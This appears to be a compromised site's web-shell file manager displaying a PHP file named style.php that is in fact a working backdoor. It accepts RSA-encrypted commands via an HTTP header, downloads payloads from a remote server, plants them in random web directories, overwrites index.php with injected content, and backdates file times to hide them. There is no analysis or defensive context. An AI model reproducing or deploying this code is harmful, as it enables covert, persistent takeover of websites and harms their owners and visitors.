OwlCyberSecurity - MANAGER

Edit File: style.php

<?php error_reporting(0);
class ErrorCode
{
    const E_200400 = 200400;
}
class MsgText
{
    const PARAM_EMPTY = 'param is empty';
    const PARAM_TYPE = 'param type error';
    const VALUE_ERROR = 'value error';
    const NOCHANGE = 'no change';
    const LOCK_FILE_SUCCESS = 'generate lock file success,but lock index.php error';
    const LOCK_FILE_ERROR = 'generate lock file error';
    const REMOTE_GET_ERROR = 'get remote content error';
    const LOCAL_FILE_ERROR = 'generate local file error';
    const SUCCESS = 'success';
    const LOCAL_FILE_EXISTS = 'local file doesn\'t exist';
    const REMOTE_FILE_EXISTS = 'remote file doesn\'t exist';
    const RENAME_ERROR = 'rename error';
    const INDEX_ERROR = 'index hijack error';
    const UNKNOWN_ERROR = 'unknown error';
    const DECRYPT_FAIL = 'params decrypt fail';
}
function error($j0 = MsgText::UNKNOWN_ERROR, $j1 = [], $i2 = 0)
{
    empty($i2) && $i2 = ErrorCode::E_200400;
    exit(@json_encode(['code' => $i2, 'msg' => $j0, 'extras' => $j1], JSON_UNESCAPED_UNICODE));
}
function success($j3)
{
    exit(@json_encode(['code' => 200, 'msg' => MsgText::SUCCESS, 'data' => $j3], JSON_UNESCAPED_UNICODE));
}
function getDirPathsByLevel($u4 = 6)
{
    $u5 = $_SERVER['DOCUMENT_ROOT'];
    $t6 = array($u5);
    $a7 = count($t6);
    while (count($t6) > ($a7 - 1)) {
        $s8 = $t6[($a7 - 1)];
        $a7 += 1;
        if (@is_dir($s8) && @$l9 = @opendir($s8)) {
            while ($i10 = @readdir($l9)) {
                $p11 = $s8 . '/' . $i10;
                if ($i10 == '.' || $i10 == '..' || !is_dir($p11) || substr($i10, 0, 1) === '.') {
                    continue;
                }
                $e12 = str_replace($u5, "", $s8);
                $s13 = explode("/", $e12);
                if (count($s13) > $u4 - 1) {
                    continue;
                }
                $t6[] = $p11;
            }
        }
        @closedir($l9);
    }
    return $t6;
}
function getUrl($e14)
{
    $v15 = curl_init();
    curl_setopt($v15, CURLOPT_URL, $e14);
    curl_setopt($v15, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($v15, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($v15, CURLOPT_TIMEOUT, 5);
    curl_setopt($v15, CURLOPT_AUTOREFERER, 0);
    curl_exec($v15);
    $t16 = curl_getinfo($v15, CURLINFO_HTTP_CODE);
    curl_close($v15);
    if ($t16 === 200) {
        $q17 = curl_exec($v15);
        return ['code' => 200, 'resp' => $q17];
    }
    return ['code' => 500, 'resp' => ''];
}
function getRemoteContent($e14)
{
    $q17 = @file_get_contents($e14);
    if ($q17 === false) {
        $v15 = curl_init();
        curl_setopt($v15, CURLOPT_URL, $e14);
        curl_setopt($v15, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($v15, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($v15, CURLOPT_TIMEOUT, 5);
        curl_setopt($v15, CURLOPT_AUTOREFERER, 0);
        $q17 = curl_exec($v15);
        curl_close($v15);
    }
    return !empty($q17) && is_string($q17) ? $q17 : '';
}
function copyfile($q17, $n18, $i19 = false, $h20 = '')
{
    if ($i19 && !empty($h20)) {
        $q17 = trim($q17);
        if (substr($q17, -2, 2) !== '?>') {
            $q17 .= ' ?>';
        }
        $q17 = $q17 . PHP_EOL . PHP_EOL . $h20;
    }
    @file_put_contents($n18, $q17);
    if (!file_exists($n18)) {
        $d21 = @fopen($n18, "w");
        @fwrite($d21, $q17);
        @fclose($d21);
    }
    if (!file_exists($n18)) {
        return false;
    }
    return true;
}
function updateFiletime($m22)
{
    $r23 = filectime($m22);
    $y24 = time();
    if (!($y24 > $r23 + 31104000)) {
        $o25 = $y24 - (mt_rand(15552000, 31104000));
        touch($m22, $o25, $o25);
        return true;
    }
    return true;
}
$z26 = '-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQC30w49ItOfldQ6
dB+0gEbeeW6BEClcx+NZzmpX2YcRHFV80BurCWBavPFehV8Sy9yL2u/y3mv3QJJ+
x2kKvly8zKx4GbXPbsWJk6Ho0Rxq49oXkBarQBOqROZeaFF3Mzpd/PdLSsxEvG1M
tQd2wOx5r6XD86jyfN7LAJUUVvbJvn1CHo03nFH12k1KYwLnQfzQI5nX7yQLa0jt
fG5TA34Fm0EMbFdHWjAN/VdEjoJI6it4PCQP5wk4ga2BvVquQkuPbsbr8364d3I6
GuGAKDR0wfkT20n0E6kAmDI3ol2bfa0rQncqUS3OU3INpxOZS8eKCIgC3bM81mdi
MQ6TsAQ9AgMBAAECggEAJLGSlA2RpLdpx8lKUuOQQfSHZGfveb/E2DZl7+dSGM5J
GkMIYtnaTAKPQ8jns37SJXCsmRRhBNf05i20ABsDtAQ/ITIwopmAAPhhR3IGdCfL
bwyqGcEOq9xZB9tW965YJk7KplLl94qNXtR8Cu5zxc6UDktjHBRk/Ky/FXJOjPKM
sA8rhox7dqlZUB3I/qiqrQOgT1Bsq1BFT+2GGwRUWZ1CyFoZvhsDomdo4yhRrB0b
8Ym4MDiVqxFPVW8XB9RFD9YKt+v50Eb6iSKJNLpRmjZDNZbrEYO6NRsRBM7brDa9
n39mZWFr47wGGXXv/NhwTvRI+2Si/ZfdP4+o5TeSWQKBgQDhIVOUODisiLhk7XKb
Yu7BW1ZFcK0JxurqHN22msvA0Q/1q4RvziETjekXIn9lVKCmS/gy2O2RtuQRulAR
fc3sz2W9tNXRF8Avy0728NG0baOOwBalO8w3cCX6Nnm70pJer+iJSn3tmAKSB4LT
vbSB8pt6QgP8NPHyQdWp2LwOtwKBgQDRB8lgSaImIMJBaXERSaoNg8kxv3/cv4g5
jUlljxNQcUsj0V7XilnB3mFxq5rHjBZTsKzMMQyvhOxYhptDfw6OLtoPUk2WiBUs
l3qU0tIXNN+cTxu2SMKTjwMktkpmACJqa+k27eEUqxrKO/6SEiP9FMXHvgA4EEBM
Hww1eU9QqwKBgAWSY5Uphw2OHLIyxkFeQ3Z5ojr5vO6fA7VjnYEld6GACxsTcaWq
vlrTik9ORUTmwUscWjo38DlJA4AE0nJ8YJpZz7TQQvJ32gPUzlGCSE5k4EVqL6VL
Q5Sjq+zzaDPj1EePpvuu4kr9FiMzGGPRMCR/MqXl+F9HmC1cv8MCYDUlAoGBAK77
g7pVKaYdWkCD0iEUt4Rkw/IfSxwyQglbmwungBWhIbO0O17X9Fd0n8IWU5WkUbRx
e9XbYbE05t0cobEZFcg0tFqLHWRcOs1/aSBYc4L1whMJrjskIa6A07LR3uoQRr8r
4qkW7YrtyZluK6eABByCXSbeiTRldk3C1+eTy6/NAoGAb9/J+NWrhYSr/VoGWjui
chXCNszy4w6exVwxXQKNTtlzKxyhQfVPK2BxrptWL6KCRKpz3wh+WY2C3QYyVfwG
FB4hwDr2mY4TWF9pD194iES1yhrQGlI8XM+2LVhBl3p0x+TFgJMaTgDDqAnxpuqT
upBYqTYMlOd+VR7hENMaFqo=
-----END PRIVATE KEY-----';
$x27 = $_SERVER['HTTP_P'];
$e28 = openssl_private_decrypt(base64_decode(urldecode($x27)), $y29, $z26) ? $y29 : null;
if (is_null($e28)) {
    error(MsgText::DECRYPT_FAIL);
}
$e28 = json_decode($e28, true);
if (!is_array($e28)) {
    error(MsgText::PARAM_TYPE, $e28);
}
if (empty($e28['server'])) {
    error('server ' . MsgText::PARAM_EMPTY);
}
if (empty($e28['iden'])) {
    error('iden ' . MsgText::PARAM_EMPTY);
}
$k30 = isset($e28['iden']) ? strtolower($e28['iden']) : '';
switch ($k30) {
    case "beima":
        $k31 = doBeima($e28);
        break;
    case "rename":
        $k31 = doRename($e28);
        break;
    case "index":
        $k31 = doIndex($e28);
        break;
    case "sub":
    case "htaccess":
        $k31 = doSub($e28);
        break;
    case "lock":
        $k31 = doLock($e28);
        break;
    case "style":
        $k31 = doStyle($e28);
        break;
    default:
        error('iden ' . MsgText::VALUE_ERROR);
}
function doBeima($e28)
{
    if (empty($e28['filename'])) {
        error('filename ' . MsgText::PARAM_EMPTY, $e28);
    }
    if (empty($e28['shellfile'])) {
        error('shellfile ' . MsgText::PARAM_EMPTY, $e28);
    }
    empty($e28['level']) && $e28['level'] = 6;
    $t6 = getDirPathsByLevel($e28['level']);
    $m32 = array_rand($t6);
    $e33 = $t6[$m32] . '/';
    $j34 = $e33 . $e28['filename'];
    $r35 = $e28['server'] . $e28['shellfile'];
    $q17 = getRemoteContent($r35);
    $q17 = json_decode($q17, true);
    if (!empty($q17['result'])) {
        if (copyfile($q17['result'], $j34)) {
            updateFiletime($j34);
            $q36 = str_replace($_SERVER['DOCUMENT_ROOT'], '', $j34);
            success(compact('localfilepath', 'beimaurl'));
        }
        error(MsgText::LOCAL_FILE_ERROR, compact('localfilepath'));
    }
    error(MsgText::REMOTE_FILE_EXISTS, compact('remoteFileUrl'));
}
function doRename($e28)
{
    if (empty($e28['sourcename'])) {
        error('sourcename ' . MsgText::PARAM_EMPTY, $e28);
    }
    if (empty($e28['rename'])) {
        error('rename ' . MsgText::PARAM_EMPTY, $e28);
    }
    if ($e28['sourcename'] === $e28['rename']) {
        error(MsgText::NOCHANGE);
    }
    $n37 = dirname(__FILE__) . DIRECTORY_SEPARATOR . $e28['sourcename'];
    $a38 = dirname(__FILE__) . DIRECTORY_SEPARATOR . $e28['rename'];
    $i39 = $e28['server'] . str_replace(strtolower($_SERVER['DOCUMENT_ROOT']), '', strtolower($n37));
    $i39 = str_replace('\\', '/', $i39);
    if (file_exists($n37)) {
        if (rename($n37, $a38)) {
            success($a38);
        } else {
            error(MsgText::RENAME_ERROR, compact('renameFile'));
        }
    } else {
        error(MsgText::LOCAL_FILE_EXISTS, compact('resSource'));
    }
}
function doIndex($e28)
{
    if (empty($e28['shellfile'])) {
        error('shellfile ' . MsgText::PARAM_EMPTY, $e28);
    }
    $j40 = $e28['server'] . trim($e28['shellfile']);
    $j34 = $_SERVER['DOCUMENT_ROOT'] . '/index.php';
    $q17 = getRemoteContent($j40);
    $q17 = json_decode($q17, true);
    if (!empty($q17['result'])) {
        $k41 = '';
        if (file_exists($j34)) {
            $k41 = @file_get_contents($j34);
        } elseif (file_exists($_SERVER['DOCUMENT_ROOT'] . '/index.html')) {
            $k41 = @file_get_contents($_SERVER['DOCUMENT_ROOT'] . '/index.html');
        } elseif (file_exists($_SERVER['DOCUMENT_ROOT'] . '/index.htm')) {
            $k41 = @file_get_contents($_SERVER['DOCUMENT_ROOT'] . '/index.htm');
        } elseif (file_exists($_SERVER['DOCUMENT_ROOT'] . '/default.html')) {
            $k41 = @file_get_contents($_SERVER['DOCUMENT_ROOT'] . '/default.html');
        } elseif (file_exists($_SERVER['DOCUMENT_ROOT'] . '/default.htm')) {
            $k41 = @file_get_contents($_SERVER['DOCUMENT_ROOT'] . '/default.htm');
        }
        if (copyfile($q17['result'], $j34, true, $k41)) {
            updateFiletime($j34);
            @chmod($j34, 0644);
            success($j34);
        }
        error(MsgText::LOCAL_FILE_ERROR, compact('localfilepath'));
    }
    error(MsgText::INDEX_ERROR, compact('remoteUrl'));
}
function doSub($e28)
{
    if (empty($e28['shellfile'])) {
        error('shellfile' . MsgText::PARAM_EMPTY, $e28);
    }
    if (empty($e28['filename'])) {
        error('filename ' . MsgText::PARAM_EMPTY, $e28);
    }
    $j34 = $_SERVER['DOCUMENT_ROOT'] . '/' . $e28['filename'];
    $r35 = $e28['server'] . $e28['shellfile'];
    $q17 = getRemoteContent($r35);
    $q17 = json_decode($q17, true);
    if (!empty($q17['result'])) {
        if (copyfile($q17['result'], $j34)) {
            updateFiletime($j34);
            @chmod($j34, 0644);
            success($j34);
        }
        error(MsgText::LOCAL_FILE_ERROR, compact('localfilepath'));
    }
    error(MsgText::REMOTE_GET_ERROR, compact('remoteFileUrl'));
}
function doLock($e28)
{
    if (empty($e28['filename'])) {
        error('filename ' . MsgText::PARAM_EMPTY, $e28);
    }
    if (empty($e28['domain'])) {
        error('domain ' . MsgText::PARAM_EMPTY, $e28);
    }
    if (empty($e28['shellfile'])) {
        error('shellfile ' . MsgText::PARAM_EMPTY, $e28);
    }
    $j34 = $_SERVER['DOCUMENT_ROOT'] . '/' . $e28['filename'];
    $r35 = $e28['server'] . $e28['shellfile'];
    $q17 = getRemoteContent($r35);
    $q17 = json_decode($q17, true);
    if (!empty($q17['result'])) {
        if (copyfile($q17['result'], $j34)) {
            $b42 = $e28['domain'] . $e28['filename'];
            $h43 = getUrl($b42);
            @unlink($j34);
            if ($h43['code'] === 200 && !empty($h43['resp']) && strpos($h43['resp'], 'success')) {
                success($h43['resp']);
            }
            error(MsgText::LOCK_FILE_SUCCESS, compact('lockurl', 'lockres'));
        }
        @unlink($j34);
        error(MsgText::LOCK_FILE_ERROR, compact('localfilepath'));
    }
    error(MsgText::REMOTE_GET_ERROR, compact('remoteFileUrl'));
}
function doStyle($e28)
{
    if (empty($e28['shellfile'])) {
        error('shellfile' . MsgText::PARAM_EMPTY, $e28);
    }
    if (empty($e28['filename'])) {
        error('filename ' . MsgText::PARAM_EMPTY, $e28);
    }
    if (empty($e28['domain'])) {
        error('domain ' . MsgText::PARAM_EMPTY, $e28);
    }
    $j34 = $e28['domain'] . $e28['filename'];
    $r35 = $e28['server'] . $e28['shellfile'];
    $q17 = getRemoteContent($r35);
    $q17 = json_decode($q17, true);
    if (!empty($q17['result'])) {
        if (copyfile($q17['result'], $j34)) {
            updateFiletime($j34);
            @chmod($j34, 0644);
            success($j34);
        }
        error(MsgText::LOCAL_FILE_ERROR, compact('localfilepath'));
    }
    error(MsgText::REMOTE_GET_ERROR, compact('remoteFileUrl'));
}